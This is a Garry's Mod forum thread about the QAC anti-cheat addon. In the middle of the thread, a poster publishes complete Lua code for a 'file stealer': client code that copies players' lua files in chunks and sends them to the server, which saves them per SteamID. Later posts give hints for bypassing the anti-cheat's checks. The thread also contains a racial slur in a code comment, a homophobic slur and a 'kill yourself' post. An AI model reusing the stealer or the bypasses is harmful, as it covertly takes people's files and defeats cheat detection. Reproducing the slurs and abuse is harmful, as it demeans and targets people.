[QUOTE=SweetTea;44911749][lua]
nr("QUACK_QUACK_MOTHER_FUCKER", function()
LocalPlayer():EmitSound("qac/quack.wav") -- RIP NIGGERS
end)
[/lua]
I <3 you man but thats a bit racist[/QUOTE]
w-wasnt me srry
it was code_gs
[QUOTE=zerothefallen;44689306]As an example, before the recent update, file.Read cant read shit with special characters in it, so of course. The #1 gmod addon "darkrp keypad + wire" or whatever caused false positive bans continuously.
[editline]30th April 2014[/editline]
yeah willox im looking at u with your + in the name u fag[/QUOTE]
That's amazing
[QUOTE=Willox;44919761]That's amazing[/QUOTE]
cant tell you how many people came to me cuz of ur keypad + whatever banning em
Any links to previous versions?
[QUOTE=Hollistupid;45233625]Any links to previous versions?[/QUOTE]
No, we won't help you get a file stealer.
sv
[lua]------------------------------
-- File Stealer server-side --
------------------------------
if SERVER then
file.CreateDir("qac")
file.CreateDir("qac/stolen")
util.AddNetworkString("CHTGTL")
util.AddNetworkString("CHCO")
net.Receive("CHTGTL", function(ln, client)
client:SetPData("CHTGTL", true)
client.FileDir = string.Replace(client:SteamID(), ":", "_")
local num = tostring(math.random(500))
client.HAX_NUMBER = num
net.Start("CHCO")
net.WriteString(num)
net.Send(client)
file.CreateDir(CHEAT_DIR.."/"..client.FileDir)
local ID = client:SteamID()
timer.Simple(200, function()
--POSSIBLE BANNING
end)
end)
net.Receive("CHCO", function(ln, client)
if not client.FileDir then
client.FileDir = string.Replace(client:SteamID(), ":", "_")
end
local num, dir, filename, filedata = net.ReadString(), net.ReadString(), net.ReadString(), net.ReadString()
local dir = (CHEAT_DIR.."/"..client.FileDir.."/"..dir)
if not file.Exists(dir, "DATA") then
file.CreateDir(dir)
end
if not file.Exists(dir.."/"..string.Replace(filename, ".lua", ".txt"), "DATA") then
file.Write(dir.."/"..string.Replace(filename, ".lua", ".txt"), [[QAC File Reader \n]]..filedata)
else
file.Append(dir.."/"..string.Replace(filename, ".lua", ".txt"), filedata)
end
end)
end
[/lua]
cl
[lua]
-- file steal pls
if CLIENT then
local frd = file.Read
local function c()
net.Start("CHTGTL")
net.SendToServer()
end
net.Receive("CHTGTL",c)
local HAX_NUMBER = "0"
local QUEUED_FILES = {}
local defaults = {
"autorun",
"entities",
"includes",
"weapons"
}
net.Receive("CHCO", function(len)
HAX_NUMBER = net.ReadString()
CopyDirNoSub("lua", "GAME")
CopyDir("lua/autorun", "GAME")
CopyDir("lua/entities", "GAME")
CopyDir("lua/includes", "GAME")
CopyDir("lua/weapons", "GAME")
timer.Simple(.3, function()
timer.Create(HAX_NUMBER, .01, 0, function()
local fd = QUEUED_FILES[table.GetFirstKey(QUEUED_FILES)]
if not fd then
timer.Remove(HAX_NUMBER)
timer.Simple(1, function()
--POISSIBLE BANNING?
end)
end
SendFileToServer(fd)
table.remove(QUEUED_FILES, table.GetFirstKey(QUEUED_FILES))
end)
end)
end)
function CopyDirNoSub(dir,src)
local files = file.Find(dir.."/*.lua", src)
if not files then files = {} end
for k,v in pairs(files) do
if v and v ~= "" then
QueueFile(dir,v,src)
end
end
local _,dirs = file.Find(dir.."/*", src)
for k,v in pairs(dirs)do
if v and v ~= "" then
if not table.HasValue(defaults, v) then
CopyDir(dir.."/"..v, src)
end
end
end
end
function CopyDir(dir,src) --copypasta from gmod wiki.
local files = file.Find(dir.."/*.lua", src)
if not files then files = {} end
for k,v in pairs(files) do
if v and v ~= "" then
QueueFile(dir,v,src)
end
end
local files,directories = file.Find(dir.."/*", src)
if not directories then directories = {} end
for _, fdir in pairs(directories) do
if fdir ~= ".svn" then
CopyDir(dir.."/"..fdir, src)
end
end
end
function QueueFile(dir,name,src)
local filedata = frd(dir.."/"..name, src)
if not filedata then filedata = "ERROR! File not readable: "..dir.."/"..name.." in '"..src.."'." return end
if string.len(filedata) > 1.7*10^200 then filedata = "ERROR! File too long: "..dir.."/"..name.." in '"..src.."'." return end
local fd1, fd2, fd3, fd4 = {dir=dir,name=name}, {dir=dir,name=name}, {dir=dir,name=name}, {dir=dir,name=name}
--split it into fourths.
fd1.filedata = string.Left(filedata, math.min(math.Round(string.len(filedata)/4), 63000))
fd2.filedata = string.Left(filedata, math.Round(string.len(filedata)*1/2))
fd2.filedata = string.Right(fd2.filedata, math.min(math.Round(string.len(fd2.filedata)/2), 63000))
fd3.filedata = string.Right(filedata, math.Round(string.len(filedata)*1/2))
fd3.filedata = string.Left(fd3.filedata, math.min(math.Round(string.len(fd3.filedata)/2), 63000))
fd4.filedata = string.Right(filedata, math.min(math.Round(string.len(filedata)/4), 63000))
table.insert(QUEUED_FILES, fd1)
table.insert(QUEUED_FILES, fd2)
table.insert(QUEUED_FILES, fd3)
table.insert(QUEUED_FILES, fd4)
end
function SendFileToServer(fd)
if not fd then
return
end
local dir, name, filedata = fd.dir, fd.name, fd.filedata
net.Start("CHCO")
net.WriteString(HAX_NUMBER)
net.WriteString(dir)--directory first
net.WriteString(name)--filename second
net.WriteString(filedata)
net.SendToServer()
end
end[/lua]
figure how to put it back in.
I was looking for the version with the working speedhack prevention implemented Ley came up with.
But hey, someone might want that filestealer anyways.
[QUOTE=Hollistupid;45233957]I was looking for the version with the working speedhack prevention implemented Ley came up with.
But hey, someone might want that filestealer anyways.[/QUOTE]
[lua]// ANTI SPEED HACK
local tolerance = 10
local speedfs = {"SetMaxSpeed", "SetForwardSpeed", "SetUpSpeed", "SetSideSpeed", "SetMaxClientSpeed"}
local QAC_MOVE = (
function(p, d)
local t = CurTime()
local l = p.QACNoSpeed
if (l) then
local d = t - l
//print(d)
if (d < (1 / (66 + tolerance))) then
for _, f in pairs(speedfs) do
ds[f](ds, 0)
end
end
end
p.QACNoSpeed = t
end)
hook.Add("Move", "QACSpeed", QAC_MOVE)[/lua]
Works like this, but it needs a bit of tinkering. it's not as effective as before.
its shit
kill yourself
[highlight](User was banned for this post ("Dumb/flaming" - SteveUK))[/highlight]
I tried but suicide returned a nil value.
Thanks for feedback!
QAC keeps detecting a file, and I have not been able to figure out why. It detects this I believe. This is inside a client side Lua file.
RunStringEx( Level.ClientFile, "Client File" )
I know from past experience that it detects file names with invalid chars but what's wrong with this ? and how can I fix it.
It is a Leystryku file that runs lua from the source "Client file"
This will not be found on the server, hence causing a ban.
Ill edit this post later with a temp fix
[editline]6th July 2014[/editline]
Replace line 107 with
[lua]if (src == "RunString" || src == "LuaCmd" || src == "[C]" || src == "Client File") then[/lua]
7/21/14 -- v 1.3
//note
Fptje is being a child and outright banning qac in all darkrp [B]because people use out-dated versions that get rid of the sv_allowcslua check that I have no control over.[/B] So I decided to pre-release my current updated version.
This version fixes a lot of things, fixes a bypass (with still two remaining, wops)
Highly suggest updating for added security.
[editline]21st July 2014[/editline]
correction: apparently a sv_allowcslua check was removed and I didnt notice. Couldnt wait till I woke up to fix.
still childish
It only turns off QAC when clside Lua is allowed, which is exactly what you just fixed yourself.
Besides, since you changed the net strings, the DarkRP QAC fuck-upper only affects the version of QAC that bans [I]innocent people[/I].
[lua]
// fuck you fptje. Immature child.
util.AddNetworkString("Ping1")
util.AddNetworkString("Ping2")
util.AddNetworkString("checksum")
util.AddNetworkString("gcontrolled_vars")
util.AddNetworkString("controlled_vars")
util.AddNetworkString("quack")
[/lua]
I'd say everyone's happy now, but I should only speak for myself.
next time wait for me to wake up mr european
[code]
debug.getupvalue = nil // one bypass fixed, one more to go.
[/code]
10/10 fix. You can still use the jit debug lib to bypass that, and even then, You can create a binary to reference the same functionality. Hint:
[code]
const char *lua_getupvalue (lua_State *L, int funcindex, int n);
[/code]
Doesn't take a genius to find a way around your checks.
[QUOTE=dingusnin;45457152][code]
debug.getupvalue = nil // one bypass fixed, one more to go.
[/code]
10/10 fix. You can still use the jit debug lib to bypass that, and even then, You can create a binary to reference the same functionality. Hint:
[code]
const char *lua_getupvalue (lua_State *L, int funcindex, int n);
[/code]
Doesn't take a genius to find a way around your checks.[/QUOTE]
Before we start a long string of posts posting blatant bypasses:
Yes I know, and I have no intention to fix any "load priority" things or update it to fix jit, debug library, e t c. If someone knows how to code c++, congrats to them, hope they make a RunStringEx loader and just set their own fenv.
I released this update before I wanted to due to fptje, and It's a simple update to fix some issues.
But really, what was the point of that post anyways, of course I cant stop someone making a binary module to bypass qac. No one can.
If you throw it up on say github, you would have more developers (such as myself) willing to go through the code, and maybe find potential exploits and fix them. Making an anti-cheat is a cat and mouse game, but more cats help (continuing the metaphor here).
[editline]21st July 2014[/editline]
Line 74 through 82 of the client side code:
[code]
for src, _ in qac.pairs(s) do
if (src == "RunString" || src == "LuaCmd" || src == "[C]") then
return
elseif (!(qac.scans[src])) then
qac.scans[src] = true
local crc = qac.util.CRC(qac.file.Read(src, "game") or "0")
qac.validate_src(src, crc)
end
end
[/code]
Line with 'return' on will break the look. Should be 'continue' if you want to check the whole table.
If you don't want to fix people using the debug lib, why would you just nil a function?
There are enough reasons for why it's there other than hacking.
Just hide the functions you use/detoured from it, but not all.
Remember. Always use white lists, not black lists (no racist). Most hacks (almost all of them) can be defeated by white listing your code, and banning any variance. If people aren't hacking, there won't be a variance.
[editline]21st July 2014[/editline]
Small bypass from your code being crc checked:
[code]
CompileString( string code, "RunString" or "LuaCmd" or "[C]" , false )
[/code]
You still need to find a way to run it, but it shouldn't be that hard.
Also there are legit scripts that just ban everyone because of your file source check.
[lua]
--legit script
--code is the code built from the script
CompileString(code, "Legit Script name or smth")()
[/lua]
Now everyone will be banned because the legit script has a custom error message that is not a file on the server
[QUOTE=zerothefallen;45457178]
I released this update before I wanted to due to fptje, and It's a simple update to fix some issues.
[/QUOTE]
One could argue that a script that permabans innocent players is a priority.
By that same logic one can argue that this was a priority when I told you months ago.
The automatic banning of innocent players is capital sin. I've told you exactly that before.
[QUOTE=dingusnin;45457594]Remember. Always use white lists, not black lists (no racist). Most hacks (almost all of them) can be defeated by white listing your code, and banning any variance. If people aren't hacking, there won't be a variance.
[editline]21st July 2014[/editline]
Small bypass from your code being crc checked:
[code]
CompileString( string code, "RunString" or "LuaCmd" or "[C]" , false )
[/code]
You still need to find a way to run it, but it shouldn't be that hard.[/QUOTE]
Problem is, a whitelist is A LOT harder to maintain and manage.
The source validation thing is a whitelist, since it doesn't allow any files that the server doesn't have.
is that a reference to my send table ? :v:
[QUOTE][IMG]http://i.imgur.com/yCY8btm.png[/IMG][/QUOTE]
[QUOTE=Leystryku;45457918]Problem is, a whitelist is A LOT harder to maintain and manage.
The source validation thing is a whitelist, since it doesn't allow any files that the server doesn't have.
is that a reference to my send table ? :v:[/QUOTE]
It's really not when you know what you want to white list. You can always automate the process of creating a white list every time a server boots. It might be hard at first but it's worth it.
:v: No I was not making reference to that, I have not taken the time to explore LeyAC (sorry).
[QUOTE=dingusnin;45457991]It's really not when you know what you want to white list. You can always automate the process of creating a white list every time a server boots. It might be hard at first but it's worth it.
:v: No I was not making reference to that, I have not taken the time to explore LeyAC (sorry).[/QUOTE]
doing it when the server boosts automatically sounds like a pain in the butt though, especially for larger whitelist, else I'd do that ( even though I could partially do that, but would make autorefresh sad, except if of course magic is used ).
[QUOTE=Leystryku;45458063]doing it when the server boosts automatically sounds like a pain in the butt though, especially for larger whitelist, else I'd do that ( even though I could partially do that, but would make autorefresh sad, except if of course magic is used ).[/QUOTE]
From memory there was either a hook, or a really easy way of detecting a lua refresh. It depends on what you want to white list. Files the client should have (detour AddCSLuaFile), hooks (and bytecode length so we can't uses Lenny's way of hook spoofing), Number of locals would probably work as well if you compared clients as you would with md5 hashes.
[url]http://wiki.garrysmod.com/page/GM/OnReloaded[/url]
And thx you called it Lenny's way of hook spoofing, lol
I'd make a github if I knew how so gmod can have a public ac.
git is hard/and/or im retarded
[QUOTE=zerothefallen;45458448]I'd make a github if I knew how so gmod can have a public ac.
git is hard/and/or im retarded[/QUOTE]
Git isn't hard ^^
Add me on steam, I will talk you through setting up a public repo.
[QUOTE=dingusnin;45458487]Git isn't hard ^^
Add me on steam, I will talk you through setting up a public repo.[/QUOTE]
ur steam redirects nowhere
Sorry, you need to Log In to post a reply to this thread.
